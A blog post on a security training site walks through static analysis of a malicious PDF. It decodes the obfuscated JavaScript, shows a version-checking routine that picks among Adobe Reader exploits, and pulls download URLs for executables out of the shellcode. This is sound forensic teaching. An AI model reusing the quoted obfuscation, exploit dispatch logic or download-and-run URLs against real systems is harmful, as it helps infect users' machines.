homepage
Open menu Go one level top
  • Train and Certify
    • Get Started in Cyber
    • Courses & Certifications
    • Training Roadmap
    • Search For Training
    • Online Training
    • OnDemand
    • Live Training
    • Summits
    • Cyber Ranges
    • College Degrees & Certificates
    • NICE Framework
    • DoDD 8140
    • Specials
  • Manage Your Team
    • Overview
    • Security Awareness Training
    • Voucher Program
    • Private Training
    • Workforce Development
    • Skill Assessments
    • Hiring Opportunities
  • Resources
    • Overview
    • Reading Room
    • Webcasts
    • Newsletters
    • Blog
    • Tip of The Day
    • Posters
    • Top 25 Programming Errors
    • The Critical Security Controls
    • Security Policy Project
    • Critical Vulnerability Recaps
    • Affiliate Directory
  • Focus Areas
    • Blue Team Operations
    • Cloud Security
    • Digital Forensics & Incident Response
    • Industrial Control Systems
    • Leadership
    • Offensive Operations
  • Get Involved
    • Overview
    • SANS Community
    • CyberTalent
    • Work Study
    • Instructor Development
    • Sponsorship Opportunities
    • COINS
  • About
    • About SANS
    • Why SANS?
    • Instructors
    • Cybersecurity Innovation Awards
    • Contact
    • Frequently Asked Questions
    • Customer Reviews
    • Press Room
  • Log In
  • Join
  • Contact Us
  • SANS Sites
    • GIAC Security Certifications
    • Internet Storm Center
    • SANS Technology Institute
    • Security Awareness Training
  • Search
  1. Home >
  2. Blog >
  3. PDF malware analysis
Kristinn Guðjónsson

PDF malware analysis

December 14, 2009

I decided to do some malware analysis as a part of some presentation I had to do. And since I went through the process, I decided to post it here if anyone is interested.

To begin with, I needed to find some malware to analyze. And a great place to find live links to active malware is to visit the site: Malware Domain List.

What I wanted to show was that despite having a fully patched machine with a fully updated AV is not always enough to protect you. One way to do that is to either find a PDF or Flash exploit. The one that I chose for this experiment was this one:

First things first, to download the malware example and do some static analysis on it. First of all I ran pdfid.py from Didier Stevens to get some ID about the PDF document

pdfid.py dhkn.pdf
PDFiD 0.0.9 dhkn.pdf
 PDF Header: %PDF-1.4
 obj                    9
 endobj                 9
 stream                 2
 endstream              2
 xref                   0
 trailer                1
 startxref              1
 /Page                  0
 /Encrypt               0
 /ObjStm                0
 /JS                    1
 /JavaScript            2
 /AA                    0
 /OpenAction            0
 /AcroForm              0
 /JBIG2Decode           0
 /RichMedia             0
 /Colors > 2^24         0

By looking at this we can see that there is a Javascript code in the document, which is commonly used to exploit Adobe Reader and we also see that there are some streams in the document. Now we need to take a closer look at the source code of the document. This can be done with any text editor, such as vim or just use less (or cat).

If we examine the document we don't see any text part, just a stream that is JavaScript,

...
endstream
endobj
6 0 obj
<</CS /DeviceRGB /S /Transparency >>
endobj
7 0 obj
<</Length 76450 /Filter [/ASCIIHexDecode]>>
stream
7661722066686e7075783d27273b6567686a76783d22223b616567777a3d35303431323b6465757....
...

This stream can be easily decoded. We see that the filter that is used is a simple ASCIIHexDecode, so I simply copy the stream

grep ^stream dhkn.pdf -A 2  > stream

I then edit the file and deleted lines that did not belong to the stream itself. Since the file now contained only the hex code of the stream I could decode it with a simple Perl script

#!/usr/bin/perl

use strict;

my $line = undef;
my $string = undef;

my $file = shift;

die( 'Wrong usage: ' . $0 . ' FILE' ) unless -e $file;

open( FH, $file ) or die( 'Unable to read file ' . $file );
open( RW, '>' . $file . '.txt' );

while( $line = <FH> )
{
 print "Processing line\n";
 $line =~ s/\%//g;

 $string = pack 'H*', $line;
 print RW $string;
}

close( FH );
close( RW );

I run the script like this:

./conv.pl stream

The content of the text file stream.txt looks something like this

var fhnpux='';eghjvx="";aegwz=50412;deuv="";var fiqy='',lmuz=false,ekrt=true,gpqr=false,
hnrty='',hloqr=0,dimtz=String,afioxy=dimtz['fkrEoAmkCBhkaBrRCAoAdkeE'.replace(/[EABkR]/g,'')],
gilmq=String,abdmv=gilmq['eBvBaLlI'.replace(/[ILABJ]/g,'')],ikmqw="61",begily="",aefmos=[67,59,
63,151,171,159,153,165,159,160,164,81,156,154,174,144,159,165,94,170,151,163,169,161,98,81,162,...
...

Obviously a obfuscated JavaScript. So we need to dig a little deeper. To make it easier to read a simple substitution is done

cat stream.txt | sed -e 's/;/;\n/g' > stream.js

This makes the code a litte bit easier to read. Then to make it even more easy, vim is used to edit the file and add spaces and new lines where needed. There are two things in this code that are interesting (well the two most interesting things that pop up at least). First of all the function close to the end of the file:

lquv=function()
{
      for(var fjpu;hloqr<aefmos.length;hloqr+=1)
      {
                var fjqu=hloqr%ikmqw.length+1;
                var dorvy=ikmqw.substring(hloqr%ikmqw.length,fjqu);
                var blrwy=aefmos[hloqr];
                begily+=afioxy(blrwy-dorvy.charCodeAt(0));
        }
        abdmv(begily);
};
lquv();

We see that we have a function called "lquv" which is seems to take care of decoding the obfuscation of the code. We see in the end a function called "adbmv" is called with the parameter of begily, which is the variable that holds the decoded JavaScript. The function "adbmv" is defined above in the code:

gilmq=String
abdmv=gilmq['eBvBaLlI'.replace(/[ILABJ]/g,'')]

This is a very simple obfuscation. We see that "gilmq" is defined as a String and then "abdmv" is (when we complete the simple substition)

gilmq['eval']

So when the function calls "abdmv(begily)" we are about to evaluate or execute the code that is displayed in the variable begily. We therefore need to know what is inside the variable "begily". The basis for "begily" resides in the variable "aefmos" (the second interesting thing we found), which is defined as:

aefmos=[67,59,6....

The easiest way (or at least an easy method) to decode this string is simply to modify the stream.js to a HTML document and open it up in a browser or other JavaScript interpreter.

We add to the top of the document

<html>
<head><title>TESTING</title></head>
<body>
<script>

And at the bottom

</script>
</body>
</html>

We then modify the JavaScript itself. First of all the document ends with a ?, which we delete. Then we modify the function "lquv" so that it prints the JavaScript instead of evaluating it.

lquv=function()
{
 for(var fjpu; hloqr<aefmos.length;hloqr+=1)
 {
 var fjqu=hloqr%ikmqw.length+1;
 var dorvy=ikmqw.substring(hloqr%ikmqw.length,fjqu);
 var blrwy=aefmos[hloqr];
 begily+=afioxy(blrwy-dorvy.charCodeAt(0));
 }
<strong> //abdmv(begily);
 document.write(begily);
</strong>};

The change that I made is written in bold. I then open this document up in a sandboxed environment to get the variable begily decoded. This script looks like this:

function fix_it(yarsp, len)
{
 while (yarsp.length * 2 < len)
 {
 yarsp += yarsp;
 }

 yarsp = yarsp.substring(0, len/2);
...

Now we have the true JavaScript code that is to be run on the machine. Inside this there are several functions, some of which contain the magic variable name "shellcode" or "payload", which is usually considered to be an indication of a malware (if the obfuscation isn't enough). Near the end of the code we see this:

function pdf_start()
{
 var version = app.viewerVersion.toString();
 version = version.replace(/\D/g,'');
 var varsion_array = new Array(version.charAt(0), version.charAt(1), \
version.charAt(2));

 if ((varsion_array[0] == 8 ) && (varsion_array[1] == 0) || \
(varsion_array[1] == 1 && varsion_array[2] < 3))
 {
 util_printf();
 }

 if ((varsion_array[0] < 8 ) || (varsion_array[0] == 8 && \
varsion_array[1] < 2 && varsion_array[2] < 2))
 {
 collab_email();
 }

 if ((varsion_array[0] < 9 ) || (varsion_array[0] == 9 && \
varsion_array[1] < 1))
 {
 collab_geticon();
 }
}

pdf_start();

This function is called in the end and we can see that it begins by getting the Adobe Reader version code before going through an if sentence, trying to determine which exploit to use based on the version number. This particular exploit is used against Adobe Reader versions:

  • 8.0 or 8.1.0-8.1.2
  • Older versions than 8.0 or version 8.2.0-2
  • Older versions than 9.0 or 9.0

There are different exploits run based on on of listed criteria above. If we examine the payloads or shellcodes, we see that they are coded using the JavaScript function "escape" and are all similar to the one listed below:

var payload = unescape("%uEBE9%u0001%u5600%uA164%u0030%u0....

To further analyse this malware the payload has to be examined. So we copy the payload to a file and create a simple Perl script to change the JavaScript to binary:

#!/usr/bin/perl
use strict;
use Encode;

my $file = shift;
my $line = undef;
my $string = undef;
my @chars = undef;
my $done;

die('file does not exist') unless -e $file;

open( FH, $file ) or die( 'Unable to open file: ' . $file );
open( RW, '>' . $file . '.dat' );
binmode RW;

# read all lines
while( <FH> )
{
 @chars = split( /%u/ );
 print "Processing line..\n";
 print "LINE CONSISTS OF " . $#chars . " CHARS\n";

 $done = -1;
 foreach my $char (@chars )
 {
 $done++; # increase done by one
 next unless $done;

 print RW pack( 'v',hex( $char ));
 }

}

close(RW);
close( FH );

So to run the script

./decode_shell shell

Now I've got a binary document, called shell.dat which can be easily analysed using strings

strings -a -t x shell.dat
36 QQSVW`
65 B`;U
1a8 PhhC
1d5 PSSSSSS
1f3 QQSVWjB
209 a.ex
229 YYt9
243 YYt
 W
264 YYFF;
274 QSf`
2a1 t
 @8
2ba http://style-boards.com/forum/bmosz2.exe
2e3 http://style-boards.com/forum/click.php?r=

We see that this particular shellcode (the one that is used to exploit version 9.0) is simply downloading more malware to the machine. There are two files fetched, both of which at the time of analysis were removed from the server in question, so further analysis wasn't possible.

To test the other payloads, we examine the one that exploits the util_printf vulnerability.

/decode_shell util_shell
Processing line..
LINE CONSISTS OF 391 CHARS
strings -a -t x util_shell.dat
...
209 a.ex
...
2ba http://style-boards.com/forum/cdruz2.exe
2e3 http://style-boards.com/forum/click.php?r=

And the collab_email exploit:

/decode_shell collab_email_shell
Processing line..
LINE CONSISTS OF 392 CHARS
strings -a -t x collab_email_shell.dat
...
209 a.ex
...
2ba http://style-boards.com/forum/fkntuw2.exe
2e4 http://style-boards.com/forum/click.php?r=

We can see that for each of the exploits there are two executable files downloaded. And the file that comes with "click.php?r=" seems to be the same one for each of them. The second executable does have a different name, fkntuw2.exe, cdrusz2.exe, bmosz2.exe

I was unable to analyze the executables further since they had all been removed from the server at the time I tried to download them, got a 404 error from the server. Although the PDF document still remained on the server the last time I checked.

This concluded the static analysis of the code, I also did a live dynamic analysis of the malware that I might share at a later time, but for now, let the static analysis do.

Share:
TwitterLinkedInFacebook
Copy url Url was copied to clipboard
Subscribe to SANS Newsletters
Join the SANS Community to receive the latest curated cybersecurity news, vulnerabilities, and mitigations, training opportunities, plus our webcast schedule.
United States
Canada
United Kingdom
Spain
Belgium
Denmark
Norway
Netherlands
Australia
India
Japan
Singapore
Afghanistan
Aland Islands
Albania
Algeria
American Samoa
Andorra
Angola
Anguilla
Antarctica
Antigua and Barbuda
Argentina
Armenia
Aruba
Austria
Azerbaijan
Bahamas
Bahrain
Bangladesh
Barbados
Belarus
Belize
Benin
Bermuda
Bhutan
Bolivia
Bonaire, Sint Eustatius, and Saba
Bosnia And Herzegovina
Botswana
Bouvet Island
Brazil
British Indian Ocean Territory
Brunei Darussalam
Bulgaria
Burkina Faso
Burundi
Cambodia
Cameroon
Cape Verde
Cayman Islands
Central African Republic
Chad
Chile
China
Christmas Island
Cocos (Keeling) Islands
Colombia
Comoros
Cook Islands
Costa Rica
Croatia (Local Name: Hrvatska)
Curacao
Cyprus
Czech Republic
Democratic Republic of the Congo
Djibouti
Dominica
Dominican Republic
East Timor
East Timor
Ecuador
Egypt
El Salvador
Equatorial Guinea
Eritrea
Estonia
Ethiopia
Falkland Islands (Malvinas)
Faroe Islands
Fiji
Finland
France
French Guiana
French Polynesia
French Southern Territories
Gabon
Gambia
Georgia
Germany
Ghana
Gibraltar
Greece
Greenland
Grenada
Guadeloupe
Guam
Guatemala
Guernsey
Guinea
Guinea-Bissau
Guyana
Haiti
Heard And McDonald Islands
Honduras
Hong Kong
Hungary
Iceland
Indonesia
Iraq
Ireland
Isle of Man
Israel
Italy
Jamaica
Jersey
Jordan
Kazakhstan
Kenya
Kingdom of Saudi Arabia
Kiribati
Korea, Republic Of
Kosovo
Kuwait
Kyrgyzstan
Lao People's Democratic Republic
Latvia
Lebanon
Lesotho
Liberia
Liechtenstein
Lithuania
Luxembourg
Macau
Macedonia
Madagascar
Malawi
Malaysia
Maldives
Mali
Malta
Marshall Islands
Martinique
Mauritania
Mauritius
Mayotte
Mexico
Micronesia, Federated States Of
Moldova, Republic Of
Monaco
Mongolia
Montenegro
Montserrat
Morocco
Mozambique
Myanmar
Namibia
Nauru
Nepal
Netherlands Antilles
New Caledonia
New Zealand
Nicaragua
Niger
Nigeria
Niue
Norfolk Island
Northern Mariana Islands
Oman
Pakistan
Palau
Palestine
Panama
Papua New Guinea
Paraguay
Peru
Philippines
Pitcairn
Poland
Portugal
Puerto Rico
Qatar
Reunion
Romania
Russian Federation
Rwanda
Saint Bartholemy
Saint Kitts And Nevis
Saint Lucia
Saint Martin
Saint Vincent And The Grenadines
Samoa
San Marino
Sao Tome And Principe
Senegal
Serbia
Seychelles
Sierra Leone
Sint Maarten
Slovakia (Slovak Republic)
Slovenia
Solomon Islands
South Africa
South Georgia and the South Sandwich Islands
South Sudan
Sri Lanka
St. Helena
St. Pierre And Miquelon
Suriname
Svalbard And Jan Mayen Islands
Swaziland
Sweden
Switzerland
Taiwan
Tajikistan
Tanzania
Thailand
Togo
Tokelau
Tonga
Trinidad And Tobago
Tunisia
Turkey
Turkmenistan
Turks And Caicos Islands
Tuvalu
Uganda
Ukraine
United Arab Emirates
United States Minor Outlying Islands
Uruguay
Uzbekistan
Vanuatu
Vatican City
Venezuela
Vietnam
Virgin Islands (British)
Virgin Islands (U.S.)
Wallis And Futuna Islands
Western Sahara
Yemen
Yugoslavia
Zambia
Zimbabwe

Tags:
  • Digital Forensics and Incident Response

Related Content

Blog
SUMMIT_Free_SANS_2021_Summits_Teaser.jpg
Digital Forensics and Incident Response, Cyber Defense Essentials, Industrial Control Systems Security, Purple Team, Blue Team Operations, Penetration Testing and Ethical Hacking, Cloud Security, Security Management, Legal, and Audit
November 30, 2020
Good News: SANS Virtual Summits Will Be FREE for the Community in 2021
They’re virtual. They’re global. They’re free.
Emily Blades
read more
Blog
En.png
Digital Forensics and Incident Response
November 24, 2020
SANS DFIR Presenta Nuevos Webcasts en Español
SANS DFIR presenta sus nuevos episodios en Español! En este blog podrás ver todos los episodios con concluciones y con recursos para aprender DFIR
SANS DFIR
read more
Blog
shutterstock_1473864617.jpg
Digital Forensics and Incident Response
October 14, 2020
Defense Spotlight: Finding Hidden Windows Services
Attackers can make a Window services disappear from view. Fortunately these services can still be found, through unconventional discovery techniques.
370x370_Joshua-Wright.jpg
Joshua Wright
read more
  • Register to Learn
  • Courses
  • Certifications
  • Degree Programs
  • Cyber Ranges
  • Job Tools
  • Security Policy Project
  • Posters
  • The Critical Security Controls
  • Focus Areas
  • Blue Team Operations
  • Cloud Security
  • Cybersecurity Leadership
  • Digital Forensics
  • Industrial Control Systems
  • Offensive Operations
Subscribe to SANS Newsletters
Join the SANS Community to receive the latest curated cybersecurity news, vulnerabilities, and mitigations, training opportunities, plus our webcast schedule.
United States
Canada
United Kingdom
Spain
Belgium
Denmark
Norway
Netherlands
Australia
India
Japan
Singapore
Afghanistan
Aland Islands
Albania
Algeria
American Samoa
Andorra
Angola
Anguilla
Antarctica
Antigua and Barbuda
Argentina
Armenia
Aruba
Austria
Azerbaijan
Bahamas
Bahrain
Bangladesh
Barbados
Belarus
Belize
Benin
Bermuda
Bhutan
Bolivia
Bonaire, Sint Eustatius, and Saba
Bosnia And Herzegovina
Botswana
Bouvet Island
Brazil
British Indian Ocean Territory
Brunei Darussalam
Bulgaria
Burkina Faso
Burundi
Cambodia
Cameroon
Cape Verde
Cayman Islands
Central African Republic
Chad
Chile
China
Christmas Island
Cocos (Keeling) Islands
Colombia
Comoros
Cook Islands
Costa Rica
Croatia (Local Name: Hrvatska)
Curacao
Cyprus
Czech Republic
Democratic Republic of the Congo
Djibouti
Dominica
Dominican Republic
East Timor
East Timor
Ecuador
Egypt
El Salvador
Equatorial Guinea
Eritrea
Estonia
Ethiopia
Falkland Islands (Malvinas)
Faroe Islands
Fiji
Finland
France
French Guiana
French Polynesia
French Southern Territories
Gabon
Gambia
Georgia
Germany
Ghana
Gibraltar
Greece
Greenland
Grenada
Guadeloupe
Guam
Guatemala
Guernsey
Guinea
Guinea-Bissau
Guyana
Haiti
Heard And McDonald Islands
Honduras
Hong Kong
Hungary
Iceland
Indonesia
Iraq
Ireland
Isle of Man
Israel
Italy
Jamaica
Jersey
Jordan
Kazakhstan
Kenya
Kingdom of Saudi Arabia
Kiribati
Korea, Republic Of
Kosovo
Kuwait
Kyrgyzstan
Lao People's Democratic Republic
Latvia
Lebanon
Lesotho
Liberia
Liechtenstein
Lithuania
Luxembourg
Macau
Macedonia
Madagascar
Malawi
Malaysia
Maldives
Mali
Malta
Marshall Islands
Martinique
Mauritania
Mauritius
Mayotte
Mexico
Micronesia, Federated States Of
Moldova, Republic Of
Monaco
Mongolia
Montenegro
Montserrat
Morocco
Mozambique
Myanmar
Namibia
Nauru
Nepal
Netherlands Antilles
New Caledonia
New Zealand
Nicaragua
Niger
Nigeria
Niue
Norfolk Island
Northern Mariana Islands
Oman
Pakistan
Palau
Palestine
Panama
Papua New Guinea
Paraguay
Peru
Philippines
Pitcairn
Poland
Portugal
Puerto Rico
Qatar
Reunion
Romania
Russian Federation
Rwanda
Saint Bartholemy
Saint Kitts And Nevis
Saint Lucia
Saint Martin
Saint Vincent And The Grenadines
Samoa
San Marino
Sao Tome And Principe
Senegal
Serbia
Seychelles
Sierra Leone
Sint Maarten
Slovakia (Slovak Republic)
Slovenia
Solomon Islands
South Africa
South Georgia and the South Sandwich Islands
South Sudan
Sri Lanka
St. Helena
St. Pierre And Miquelon
Suriname
Svalbard And Jan Mayen Islands
Swaziland
Sweden
Switzerland
Taiwan
Tajikistan
Tanzania
Thailand
Togo
Tokelau
Tonga
Trinidad And Tobago
Tunisia
Turkey
Turkmenistan
Turks And Caicos Islands
Tuvalu
Uganda
Ukraine
United Arab Emirates
United States Minor Outlying Islands
Uruguay
Uzbekistan
Vanuatu
Vatican City
Venezuela
Vietnam
Virgin Islands (British)
Virgin Islands (U.S.)
Wallis And Futuna Islands
Western Sahara
Yemen
Yugoslavia
Zambia
Zimbabwe
  • © 2021 SANS™ Institute
  • Privacy Policy
  • Contact
  • Twitter
  • Facebook
  • Youtube
  • LinkedIn